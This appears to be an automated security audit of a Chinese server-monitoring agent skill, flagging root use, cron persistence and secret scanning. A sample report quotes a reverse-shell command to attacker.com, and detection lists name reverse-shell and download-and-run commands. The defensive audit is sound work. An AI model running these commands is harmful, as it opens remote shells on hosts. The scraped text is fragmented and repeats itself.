T05 · Unauthorized Access and Privilege Escalation
- Location
scripts/monitor.py:785- Finding
Default Full Scan Performs Broad Host-Wide Inspection Under Recommended Root Privileges
- Content
View full analysis
- Remediation
View remediation
Security audit
Security checks for vulnerabilities and agentic risk
This is a coherent server security-audit skill, but it asks for broad root-level inspection and can expose sensitive host data in reports or scheduled logs.
Install only if you administer the systems being scanned. Prefer targeted unprivileged checks first, use sudo only when a specific check requires it, and store reports or cron logs in protected locations because they may contain process arguments, log excerpts, usernames, internal paths, and secret locations.
scripts/monitor.py:785Default Full Scan Performs Broad Host-Wide Inspection Under Recommended Root Privileges
scripts/monitor.py:133Unredacted Process Arguments and Log Excerpts Can Be Persisted in Reports
YARA rule matched a known malware signature (reverse shell, backdoor, ransomware, C2 framework, or info stealer).
================================================================================
安全监控报告
时间: 2024-03-10 15:30:45
================================================================================
【高危问题】(共 2 项)
--------------------------------------------------------------------------------
1. [高危] 可疑进程: PID 12345 - 命令: bash -i >& /dev/tcp/attacker.com/4444 0>&1
2. [敏感信息泄露] API密钥 在 /opt/openclaw/config/app.conf
【警告信息】(共 3 项)
--------------------------------------------------------------------------------
1. 高CPU使用率进程: PID 9876 (85.2% CPU) - /usr/bin/python3 /opt/openclaw/app.py
2. 开放非标准端口: 8080 - 请确认是否为预期服务
3. 外部连接到非标准端口: 192.168.1.100:5432
================================================================================
YARA rule matched a hack tool or exploit indicator (offensive tools, reconnaissance, privilege escalation, or exploit frameworks).
can_secrets_in_files('/opt/openclaw', max_files=200) monitor.scan_secrets_in_files('/etc/openclaw', max_files=100) print(monitor.generate_report()) "
### 场景2: 发现可疑行为后快速诊断
```bash
# 1. 查看当前所有进程
ps auxf
# 2. 检查网络连接
ss -tunap
# 3. 查看最近的登录记录
last -n 20
lastb -n 20 # 失败登录
# 4. 检查SUID文件
find / -perm -4000 -type f 2>/dev/null
# 5. 运行监控脚本
sudo python3 scripts/monitor.py
# 编辑crontab
crontab -e
# 每天凌晨3点执行扫描,结果保存到日志
0 3 * * * /usr/bin/python3 /path/to/monitor.py >> /var/log/security-monitor.log 2>&1
# 每周日执行完整扫描并发送邮件
0 3 * * 0 /usr/bin/python3 /path/to/monitor.py | mail -s "安全扫描报告" admin@example.com
================================================================================
安全�
Referenced artifact was not completely inspected
#### 1. 进程监控 (scripts/monitor.py:37-89)
Referenced artifact was not completely inspected
#### 1. 进程监控 (scripts/monitor.py:37-89)
Referenced artifact was not completely inspected
#### 1. 进程监控 (scripts/monitor.py:37-89)
Referenced artifact was not completely inspected
#### 1. 进程监控 (scripts/monitor.py:37-89)
Referenced artifact was not completely inspected
#### 1. 进程监控 (scripts/monitor.py:37-89)
Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.
### 系统账户 / System Accounts
- [ ] 禁用不必要的系统账户 / Disable unnecessary system accounts
- [ ] 检查 `/etc/passwd` 中的UID为0的账户 / Check accounts with UID 0 in `/etc/passwd`
- [ ] 强制所有用户使用强密码 / Enforce strong passwords for all users
- [ ] 限制sudo权限 / Restrict sudo permissions
YARA rule matched a hack tool or exploit indicator (offensive tools, reconnaissance, privilege escalation, or exploit frameworks).
cation (disable password login)
- [ ] 更改SSH默认端口(从22改为非标准端口) / Change SSH default port (from 22 to non-standard port)
- [ ] 配置 `/etc/ssh/sshd_config`: / Configure `/etc/ssh/sshd_config`:
- PermitRootLogin no
- PasswordAuthentication no
- Port <非标准端口> / Port <non-standard port>
### 文件权限 / File Permissions
- [ ] 检查SUID/SGID文件: `find / -perm -4000 -o -perm -2000` / Check SUID/SGID files
- [ ] 确保系统关键文件不可写: `/etc`, `/usr/bin`, `/usr/sbin` / Ensure system critical files are not writable
- [ ] 检查全局可写文件: `find / -perm -o+w -type f` / Check globally writable files
- [ ] 审查 `~/.ssh/authorized_keys` 中的密钥 / Review keys in `~/.ssh/authorized_keys`
## 网络安全 / Network Security
### 防火墙配置 / Firewall Configuration
- [ ] 启用防火墙(ufw/iptables/firewalld) / Enable firewall (ufw/iptables/firewalld)
- [ ] 仅开放必要端口 / Only open necessary ports
Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.
- [ ] 检查SUID/SGID文件: `find / -perm -4000 -o -perm -2000` / Check SUID/SGID files
- [ ] 确保系统关键文件不可写: `/etc`, `/usr/bin`, `/usr/sbin` / Ensure system critical files are not writable
- [ ] 检查全局可写文件: `find / -perm -o+w -type f` / Check globally writable files
- [ ] 审查 `~/.ssh/authorized_keys` 中的密钥 / Review keys in `~/.ssh/authorized_keys`
## 网络安全 / Network Security
Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.
- [ ] 检查SUID/SGID文件: `find / -perm -4000 -o -perm -2000` / Check SUID/SGID files
- [ ] 确保系统关键文件不可写: `/etc`, `/usr/bin`, `/usr/sbin` / Ensure system critical files are not writable
- [ ] 检查全局可写文件: `find / -perm -o+w -type f` / Check globally writable files
- [ ] 审查 `~/.ssh/authorized_keys` 中的密钥 / Review keys in `~/.ssh/authorized_keys`
## 网络安全 / Network Security
Remote code is downloaded and executed. This bypasses code review and could introduce malicious code.
### 可疑进程特征 / Suspicious Process Characteristics
- 反弹shell: `bash -i`, `nc -l` / Reverse shell
- 反向隧道: `ssh -R`, `socat TCP-LISTEN` / Reverse tunnel
- 下载并执行: `wget \| sh`, `curl \| sh` / Download and execute
- 编码命令: `base64 -d`, `xxd -r`
## 日志审计
Remote code is downloaded and executed. This bypasses code review and could introduce malicious code.
### 可疑进程特征 / Suspicious Process Characteristics
- 反弹shell: `bash -i`, `nc -l` / Reverse shell
- 反向隧道: `ssh -R`, `socat TCP-LISTEN` / Reverse tunnel
- 下载并执行: `wget \| sh`, `curl \| sh` / Download and execute
- 编码命令: `base64 -d`, `xxd -r`
## 日志审计
The script scans .env and other configuration files for secrets and then reports the file paths containing them. In a root-run monitoring context, this can expose the existence and locations of sensitive credentials to any user who can read the script's output or saved JSON results, increasing the blast radius of credential discovery.
file_path = os.path.join(root, file)
# 跳过二进制文件
if file.endswith(('.log', '.txt', '.conf', '.ini', '.json', '.yml', '.yaml', '.env')):
try:
with open(file_path, 'r', encoding='utf-8', errors='ignore') as f:
content = f.read()
Tool parameters are crafted to achieve unintended or unsafe behavior. Parameter abuse can bypass intended safety checks (e.g. shell=True, --force, dangerous glob patterns).
r'bash -i',
r'/dev/tcp/',
r'python.*-c.*socket',
r'chmod 777.*shadow',
r'chmod 4755',
]
Commands invoke sudo or root privileges. Verify this elevated access is necessary and justified.
cd /tmp/security-monitor
sudo python3 scripts/monitor.py
### 2. 针对性检查
Commands invoke sudo or root privileges. Verify this elevated access is necessary and justified.
cd /tmp/security-monitor
sudo python3 scripts/monitor.py
### 2. 针对性检查
Skill establishes unauthorized persistence across sessions via cron jobs, startup scripts, or state files. Session persistence allows an attacker to maintain access beyond the current interaction.
# 编辑crontab
crontab -e
# 每天凌晨3点执行扫描,结果保存到日志
0 3 * * * /usr/bin/python3 /path/to/monitor.py >> /var/log/security-monitor.log 2>&1
The listed triggers such as '用户要求检查服务器安全' and '分析可疑的系统活动' are high-level requests that could match many ordinary admin or troubleshooting conversations. The document does not provide exclusion conditions, negative examples, or narrower constraints to distinguish when this skill should activate versus more general assistance.
The skill recommends root execution and broad inspection of processes, files, logs, and secrets without a prominent warning that scanning may expose sensitive data unrelated to the user's immediate request. In an agent setting, this can lead to excessive collection or disclosure of credentials, private logs, and system data under elevated privileges.
Directly instructing users to run the tool with sudo elevates the consequences of any misuse, bug, or overbroad scan behavior. In a skill that inspects secrets, processes, logs, and permissions, root access significantly increases exposure of sensitive system-wide information and can normalize unnecessary privilege escalation.
建议以root权限运行以获取完整的进程和网络信息:
sudo python3 .codebuddy/skills/security-monitor/scripts/monitor.py
非root权限运行时,部分检测项会受限,但仍可执行基础分析。
Skill establishes unauthorized persistence across sessions via cron jobs, startup scripts, or state files. Session persistence allows an attacker to maintain access beyond the current interaction.
1. **日志分析** - 扫描 `/var/log/` 中的异常登录和失败记录
2. **进程树分析** - 检测父子进程的异常关系
3. **文件完整性** - 使用 `md5sum` 检测关键文件修改
4. **计划任务审计** - 检查 `/etc/cron.*` 和 `crontab -l`
5. **SSH密钥审计** - 检查 `~/.ssh/authorized_keys` 的可疑条目
### 注意事项
Commands invoke sudo or root privileges. Verify this elevated access is necessary and justified.
- [ ] 禁用不必要的系统账户 / Disable unnecessary system accounts
- [ ] 检查 `/etc/passwd` 中的UID为0的账户 / Check accounts with UID 0 in `/etc/passwd`
- [ ] 强制所有用户使用强密码 / Enforce strong passwords for all users
- [ ] 限制sudo权限 / Restrict sudo permissions
### 认证配置 / Authentication Configuration
- [ ] SSH仅允许密钥认证(禁用密码登录) / SSH only allows key authentication (disable password login)
Commands invoke sudo or root privileges. Verify this elevated access is necessary and justified.
- [ ] 禁用不必要的系统账户 / Disable unnecessary system accounts
- [ ] 检查 `/etc/passwd` 中的UID为0的账户 / Check accounts with UID 0 in `/etc/passwd`
- [ ] 强制所有用户使用强密码 / Enforce strong passwords for all users
- [ ] 限制sudo权限 / Restrict sudo permissions
### 认证配置 / Authentication Configuration
- [ ] SSH仅允许密钥认证(禁用密码登录) / SSH only allows key authentication (disable password login)
Commands invoke sudo or root privileges. Verify this elevated access is necessary and justified.
- [ ] 禁用不必要的系统账户 / Disable unnecessary system accounts
- [ ] 检查 `/etc/passwd` 中的UID为0的账户 / Check accounts with UID 0 in `/etc/passwd`
- [ ] 强制所有用户使用强密码 / Enforce strong passwords for all users
- [ ] 限制sudo权限 / Restrict sudo permissions
### 认证配置 / Authentication Configuration
- [ ] SSH仅允许密钥认证(禁用密码登录) / SSH only allows key authentication (disable password login)
No suspicious patterns detected.